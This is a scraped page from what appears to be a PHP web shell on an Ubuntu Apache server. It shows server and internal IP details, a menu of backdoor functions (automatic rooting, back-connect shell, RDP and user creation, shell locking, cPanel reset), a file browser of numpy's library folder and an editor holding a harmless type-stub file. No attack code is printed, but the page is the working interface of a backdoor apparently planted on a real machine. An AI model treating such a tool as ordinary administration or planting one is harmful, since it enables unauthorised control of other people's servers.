Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
python3 /
dist-packages /
numpy /
lib /
[ HOME SHELL ]
Name
Size
Permission
Action
__pycache__
[ DIR ]
drwxr-xr-x
tests
[ DIR ]
drwxr-xr-x
__init__.py
1.74
KB
-rw-r--r--
__init__.pyi
5.19
KB
-rw-r--r--
_datasource.py
22.14
KB
-rw-r--r--
_iotools.py
30.21
KB
-rw-r--r--
_version.py
4.74
KB
-rw-r--r--
_version.pyi
701
B
-rw-r--r--
arraypad.py
30.49
KB
-rw-r--r--
arraypad.pyi
96
B
-rw-r--r--
arraysetops.py
25.86
KB
-rw-r--r--
arraysetops.pyi
496
B
-rw-r--r--
arrayterator.py
6.9
KB
-rw-r--r--
arrayterator.pyi
1.52
KB
-rw-r--r--
format.py
30.71
KB
-rw-r--r--
format.pyi
879
B
-rw-r--r--
function_base.py
158.21
KB
-rw-r--r--
function_base.pyi
1.94
KB
-rw-r--r--
histograms.py
39.27
KB
-rw-r--r--
histograms.pyi
280
B
-rw-r--r--
index_tricks.py
29.92
KB
-rw-r--r--
index_tricks.pyi
4.91
KB
-rw-r--r--
mixins.py
6.89
KB
-rw-r--r--
mixins.pyi
2.1
KB
-rw-r--r--
nanfunctions.py
57.76
KB
-rw-r--r--
nanfunctions.pyi
1.05
KB
-rw-r--r--
npyio.py
87.39
KB
-rw-r--r--
npyio.pyi
2.17
KB
-rw-r--r--
polynomial.py
42.79
KB
-rw-r--r--
polynomial.pyi
415
B
-rw-r--r--
recfunctions.py
55.2
KB
-rw-r--r--
scimath.py
14.53
KB
-rw-r--r--
scimath.pyi
212
B
-rw-r--r--
setup.py
405
B
-rw-r--r--
shape_base.py
37.47
KB
-rw-r--r--
shape_base.pyi
726
B
-rw-r--r--
stride_tricks.py
17.43
KB
-rw-r--r--
stride_tricks.pyi
510
B
-rw-r--r--
twodim_base.py
28.26
KB
-rw-r--r--
twodim_base.pyi
859
B
-rw-r--r--
type_check.py
20.29
KB
-rw-r--r--
type_check.pyi
461
B
-rw-r--r--
ufunclike.py
7.84
KB
-rw-r--r--
ufunclike.pyi
1.28
KB
-rw-r--r--
user_array.py
7.54
KB
-rw-r--r--
utils.py
32.36
KB
-rw-r--r--
utils.pyi
2.47
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : arrayterator.pyi
import sys from typing import ( List, Any, TypeVar, Generator, List, Union, Tuple, overload, ) from numpy import ndarray, dtype, generic from numpy.typing import DTypeLike # TODO: Set a shape bound once we've got proper shape support _Shape = TypeVar("_Shape", bound=Any) _DType = TypeVar("_DType", bound=dtype[Any]) _ScalarType = TypeVar("_ScalarType", bound=generic) _Index = Union[ Union[ellipsis, int, slice], Tuple[Union[ellipsis, int, slice], ...], ] __all__: List[str] # NOTE: In reality `Arrayterator` does not actually inherit from `ndarray`, # but its ``__getattr__` method does wrap around the former and thus has # access to all its methods class Arrayterator(ndarray[_Shape, _DType]): var: ndarray[_Shape, _DType] # type: ignore[assignment] buf_size: None | int start: List[int] stop: List[int] step: List[int] @property # type: ignore[misc] def shape(self) -> Tuple[int, ...]: ... @property def flat( # type: ignore[override] self: ndarray[Any, dtype[_ScalarType]] ) -> Generator[_ScalarType, None, None]: ... def __init__( self, var: ndarray[_Shape, _DType], buf_size: None | int = ... ) -> None: ... @overload def __array__(self, dtype: None = ...) -> ndarray[Any, _DType]: ... @overload def __array__(self, dtype: DTypeLike) -> ndarray[Any, dtype[Any]]: ... def __getitem__(self, index: _Index) -> Arrayterator[Any, _DType]: ... def __iter__(self) -> Generator[ndarray[Any, _DType], None, None]: ...
Close